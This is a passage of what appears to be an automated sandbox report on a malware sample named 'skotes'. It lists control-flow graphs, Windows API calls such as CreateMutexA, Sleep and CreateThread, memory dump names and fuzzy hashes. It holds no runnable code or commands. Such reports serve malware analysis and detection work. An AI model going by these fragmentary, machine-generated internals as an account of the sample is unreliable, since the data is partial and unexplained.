                                                                                                                                              control_flow_graph 1725 436fb4-436fe9 GetFileType 1726 4370a1-4370a4 1725->1726 1727 436fef-436ffa 1725->1727 1730 4370a6-4370a9 1726->1730 1731 4370cd-4370f5 1726->1731 1728 43701c-437038 call 4340f0 GetFileInformationByHandle 1727->1728 1729 436ffc-43700d call 43732a 1727->1729 1741 4370be-4370cb call 4375c0 1728->1741 1746 43703e-437080 call 43727c call 437124 * 3 1728->1746 1743 437013-43701a 1729->1743 1744 4370ba-4370bc 1729->1744 1730->1731 1736 4370ab-4370ad 1730->1736 1732 437112-437114 1731->1732 1733 4370f7-43710a 1731->1733 1738 437115-437123 call 41cff1 1732->1738 1733->1732 1749 43710c-43710f 1733->1749 1740 4370af-4370b4 call 4375f6 1736->1740 1736->1741 1740->1744 1741->1744 1743->1728 1744->1738 1761 437085-43709d call 437249 1746->1761 1749->1732 1761->1732 1764 43709f 1761->1764 1764->1744
                                                                                                                                              APIs
                                                                                                                                              • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00436EE6), ref: 00436FD6
                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 00437030
                                                                                                                                              • __dosmaperr.LIBCMT ref: 004370C5
                                                                                                                                                • Part of subcall function 0043732A: __dosmaperr.LIBCMT ref: 0043735F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                              • String ID: nC
                                                                                                                                              • API String ID: 2531987475-4036674207
                                                                                                                                              • Opcode ID: 4f35835494ed1b616429f2cbe61339839b0a90c39491ae3327cbf250b61df6b1
                                                                                                                                              • Instruction ID: 3c962bd61754ed57fc80dac4ea44a5d67823964de56beca9c8e51ad0edd48422
                                                                                                                                              • Opcode Fuzzy Hash: 4f35835494ed1b616429f2cbe61339839b0a90c39491ae3327cbf250b61df6b1
                                                                                                                                              • Instruction Fuzzy Hash: F24140B2904204ABDF389F76DC419ABBBF9EF49304F10541EF996D3611E6349940DB25

Control-flow Graph: control_flow_graph 1765, starting at 409ba5 (GetFileAttributesA); nodes are marked Executed or Not Executed.
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00409BA8
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 7443bcfcd3464c4d27045057fe77a8d1a6ac5a589fb9b08eb10097b3909b16ba
                                                                                                                                              • Instruction ID: 3ef3e4e33d59fa22e7d6d505b75130d5e6ce5164d26c49e161d1452d1a8baf31
                                                                                                                                              • Opcode Fuzzy Hash: 7443bcfcd3464c4d27045057fe77a8d1a6ac5a589fb9b08eb10097b3909b16ba
                                                                                                                                              • Instruction Fuzzy Hash: 9C312C71B042009BFB08DB68DD8975DB7B2ABC6314F24862AE014B73D6C77D5E80875A

Control-flow Graph: control_flow_graph 1802, starting at 409cda (GetFileAttributesA); nodes are marked Executed or Not Executed.
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00409CDD
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: a56b2bddcae878a69032a41053501eaffb11e0449938a8bc4cd5d9e09db70089
                                                                                                                                              • Instruction ID: ba2e40fcba1768e6d3169c730849953719c42aa131929d2da9312b918ec8e80b
                                                                                                                                              • Opcode Fuzzy Hash: a56b2bddcae878a69032a41053501eaffb11e0449938a8bc4cd5d9e09db70089
                                                                                                                                              • Instruction Fuzzy Hash: BA3148717042409BEB08DB78DD8879DB762EF86314F24862AE014B73D6C73D5E90871A

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 1839 409f44-409f64 GetFileAttributesA 1842 409f92-409fae 1839->1842 1843 409f66-409f72 1839->1843 1846 409fb0-409fbc 1842->1846 1847 409fdc-409ffb 1842->1847 1844 409f74-409f82 1843->1844 1845 409f88-409f8f call 41d663 1843->1845 1844->1845 1850 40a92b 1844->1850 1845->1842 1852 409fd2-409fd9 call 41d663 1846->1852 1853 409fbe-409fcc 1846->1853 1848 40a029-40a916 call 4180c0 1847->1848 1849 409ffd-40a009 1847->1849 1854 40a00b-40a019 1849->1854 1855 40a01f-40a026 call 41d663 1849->1855 1857 40a953-40a987 Sleep CreateMutexA 1850->1857 1858 40a92b call 436c6a 1850->1858 1852->1847 1853->1850 1853->1852 1854->1850 1854->1855 1855->1848 1868 40a98e-40a994 1857->1868 1858->1857 1869 40a996-40a998 1868->1869 1870 40a9a7-40a9a8 1868->1870 1869->1870 1871 40a99a-40a9a5 1869->1871 1871->1870 1873 40a9a9-40a9b0 call 436629 1871->1873
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00409F47
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 09d778b212ce3a0c12c5a88f72f5d041e3a321c00f46a3d6d0cef2e0a36233c3
                                                                                                                                              • Instruction ID: 95f91a6a7f128e57141cb3ae18afd5bb7beb12c4e4fe4e7c33333da1deca30b6
                                                                                                                                              • Opcode Fuzzy Hash: 09d778b212ce3a0c12c5a88f72f5d041e3a321c00f46a3d6d0cef2e0a36233c3
                                                                                                                                              • Instruction Fuzzy Hash: FE3126717042049BEB08DB68DD887ADB7A2EB86314F24862AE014F73D1D77D9A90875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 1876 40a079-40a099 GetFileAttributesA 1879 40a0c7-40a0e3 1876->1879 1880 40a09b-40a0a7 1876->1880 1881 40a111-40a130 1879->1881 1882 40a0e5-40a0f1 1879->1882 1883 40a0a9-40a0b7 1880->1883 1884 40a0bd-40a0c4 call 41d663 1880->1884 1888 40a132-40a13e 1881->1888 1889 40a15e-40a916 call 4180c0 1881->1889 1886 40a0f3-40a101 1882->1886 1887 40a107-40a10e call 41d663 1882->1887 1883->1884 1890 40a930-40a987 call 436c6a Sleep CreateMutexA 1883->1890 1884->1879 1886->1887 1886->1890 1887->1881 1894 40a140-40a14e 1888->1894 1895 40a154-40a15b call 41d663 1888->1895 1905 40a98e-40a994 1890->1905 1894->1890 1894->1895 1895->1889 1906 40a996-40a998 1905->1906 1907 40a9a7-40a9a8 1905->1907 1906->1907 1908 40a99a-40a9a5 1906->1908 1908->1907 1910 40a9a9-40a9b0 call 436629 1908->1910
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A07C
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: c55d1878aebb8d9cef37dd82cb0a5666884418d319a6168eeb28c5d43d27acc6
                                                                                                                                              • Instruction ID: db90667c79c6d84f4cc63ea4ecbff6d04f35da47fd629eb621b1877855994845
                                                                                                                                              • Opcode Fuzzy Hash: c55d1878aebb8d9cef37dd82cb0a5666884418d319a6168eeb28c5d43d27acc6
                                                                                                                                              • Instruction Fuzzy Hash: 1C3148717003049BEB08DB78DD88BADB772DB86314F24863AE014BB3D1C77D5990865B

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1913 40a1ae-40a1ce GetFileAttributesA 1916 40a1d0-40a1dc 1913->1916 1917 40a1fc-40a218 1913->1917 1920 40a1f2-40a1f9 call 41d663 1916->1920 1921 40a1de-40a1ec 1916->1921 1918 40a246-40a265 1917->1918 1919 40a21a-40a226 1917->1919 1924 40a293-40a916 call 4180c0 1918->1924 1925 40a267-40a273 1918->1925 1922 40a228-40a236 1919->1922 1923 40a23c-40a243 call 41d663 1919->1923 1920->1917 1921->1920 1926 40a935 1921->1926 1922->1923 1922->1926 1923->1918 1931 40a275-40a283 1925->1931 1932 40a289-40a290 call 41d663 1925->1932 1928 40a953-40a987 Sleep CreateMutexA 1926->1928 1929 40a935 call 436c6a 1926->1929 1942 40a98e-40a994 1928->1942 1929->1928 1931->1926 1931->1932 1932->1924 1943 40a996-40a998 1942->1943 1944 40a9a7-40a9a8 1942->1944 1943->1944 1945 40a99a-40a9a5 1943->1945 1945->1944 1947 40a9a9-40a9b0 call 436629 1945->1947
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A1B1
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 1804cf0e98361164bdf5e6ac00f0ce54103a9b5ae5486d41e5866e9644f22e63
                                                                                                                                              • Instruction ID: f462ed77387905a2e2995f090e23c07cd9c0328172b7ec7b47117eea21b7f895
                                                                                                                                              • Opcode Fuzzy Hash: 1804cf0e98361164bdf5e6ac00f0ce54103a9b5ae5486d41e5866e9644f22e63
                                                                                                                                              • Instruction Fuzzy Hash: FB314871B003409BEB08DBA8DD897ADB772AB86314F20867EE014BB3D1D77D5990875A
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A2E6
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 7500970dd31c3cf508ec90fc840381abead48dcfaede4a669dc5179d63b158af
                                                                                                                                              • Instruction ID: fe6f6cba435e4a12652cf792534311697ffec024e535210dd91808192b1246c4
                                                                                                                                              • Opcode Fuzzy Hash: 7500970dd31c3cf508ec90fc840381abead48dcfaede4a669dc5179d63b158af
                                                                                                                                              • Instruction Fuzzy Hash: C63148717043409BEB18DB68DD84BADB772AB96314F20863AE414B73D1C77D9990871A
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A41B
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 4a574c7a82777d5daea48f23ee4f77c5fdccee369211dae91a2f447584d087d2
                                                                                                                                              • Instruction ID: 17e4180386c4bd2807e64a5d06c9af003e3f7a54cd91b54b1cf68110fae4351c
                                                                                                                                              • Opcode Fuzzy Hash: 4a574c7a82777d5daea48f23ee4f77c5fdccee369211dae91a2f447584d087d2
                                                                                                                                              • Instruction Fuzzy Hash: BB313971B003009BEB08DBB8DD89B6DB672EB86314F24862AE014B73D5D7BD5990865B
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A550
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: db30252aad59b5deb3f3b0fddea5420fdf50c2efa82c76defb9ef50fde7e7ca3
                                                                                                                                              • Instruction ID: 16c91c8921310b6120f67e49507417ecf721b851789ce90cf3e9ee9f25b86078
                                                                                                                                              • Opcode Fuzzy Hash: db30252aad59b5deb3f3b0fddea5420fdf50c2efa82c76defb9ef50fde7e7ca3
                                                                                                                                              • Instruction Fuzzy Hash: 0E311A717042009BEB08DB78DD89B6DB772EB86318F24862AE054B73D1D77D9990871A
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A685
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 8a0d26e10cbefae02a1633ac4902a544a93d27001b7e329b2b49e66d2ed36cef
                                                                                                                                              • Instruction ID: 709cb29e7328af448dcf07448c8c236c67edb2359e378381bdc173a3513cd83b
                                                                                                                                              • Opcode Fuzzy Hash: 8a0d26e10cbefae02a1633ac4902a544a93d27001b7e329b2b49e66d2ed36cef
                                                                                                                                              • Instruction Fuzzy Hash: 813128717043009BEB08DB78DD89B6DB772EB86314F24C63AE014B73D1C77D9990865A
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A7BA
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 378778fd5d0710ec5199e3c576d956b9f961677f84915805db1ba2ea6ce136c8
                                                                                                                                              • Instruction ID: a2f900a19405092743d26a0148bca9ae7e29c7ac3e456dd8a1ac5528bfb0a20e
                                                                                                                                              • Opcode Fuzzy Hash: 378778fd5d0710ec5199e3c576d956b9f961677f84915805db1ba2ea6ce136c8
                                                                                                                                              • Instruction Fuzzy Hash: 30312872B04204DBEB08DB68DD89B9DB772AB86314F24C63AE014B73D1D73D9991861A
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 811fbef2f2b2200fd57d586cf863b1a07e6af11d06e7e4e7cbd380df3d02923f
                                                                                                                                              • Instruction ID: 3da747e7344faee21d66e8d5481ea497d69118624a01785c18ed32457c7aa1f6
                                                                                                                                              • Opcode Fuzzy Hash: 811fbef2f2b2200fd57d586cf863b1a07e6af11d06e7e4e7cbd380df3d02923f
                                                                                                                                              • Instruction Fuzzy Hash: 44E07D1038D300DBF60037EA7C42F2E319A87F6B02F238C36E108E61D08A7C5A50412F
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000064,EBA58D57,?,00000000,00449138,000000FF), ref: 004075CC
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00407430,00468638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004076BE
                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076C9
                                                                                                                                                • Part of subcall function 0041D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0041D17B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 79123409-0
                                                                                                                                              • Opcode ID: b3cf8c25aec0e30dfa015e4cdb72171895f004899b4dc290b2b7f84ca52731a8
                                                                                                                                              • Instruction ID: 53ac67d95e907d2114e7fe8b305045318cbc9e255b6c8c7dce3b8156424e6144
                                                                                                                                              • Opcode Fuzzy Hash: b3cf8c25aec0e30dfa015e4cdb72171895f004899b4dc290b2b7f84ca52731a8
                                                                                                                                              • Instruction Fuzzy Hash: B351D4B0641248ABEB14CF28DD85B8D3BA1EB45718F50462EF815973D1DBBDE4808B9F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: acdba158793360f3cbee7b0b8edd676e12ab73e1750a3b7c50b66f81d6b10ae5
                                                                                                                                              • Instruction ID: 417cd35f673a03891b9d131c3b585e6c9faffa788f3cc0aa10dd21450d87cd8f
                                                                                                                                              • Opcode Fuzzy Hash: acdba158793360f3cbee7b0b8edd676e12ab73e1750a3b7c50b66f81d6b10ae5
                                                                                                                                              • Instruction Fuzzy Hash: C2217B725051097BEB206B69DC02B9F3729DF4533CF12531AF9202B2C1D7789E058664
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00416D11
                                                                                                                                              • Sleep.KERNEL32(00007530), ref: 00416D25
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateSleepThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4202482776-0
                                                                                                                                              • Opcode ID: 3f7075ae21071cbe051501ae2a10001984a94b7d474ad0fe30bab9cf7ce6c77b
                                                                                                                                              • Instruction ID: 6d20f71b382fdeb950df7f04c05b36a9693e4fe3457e24c9ad85765341071deb
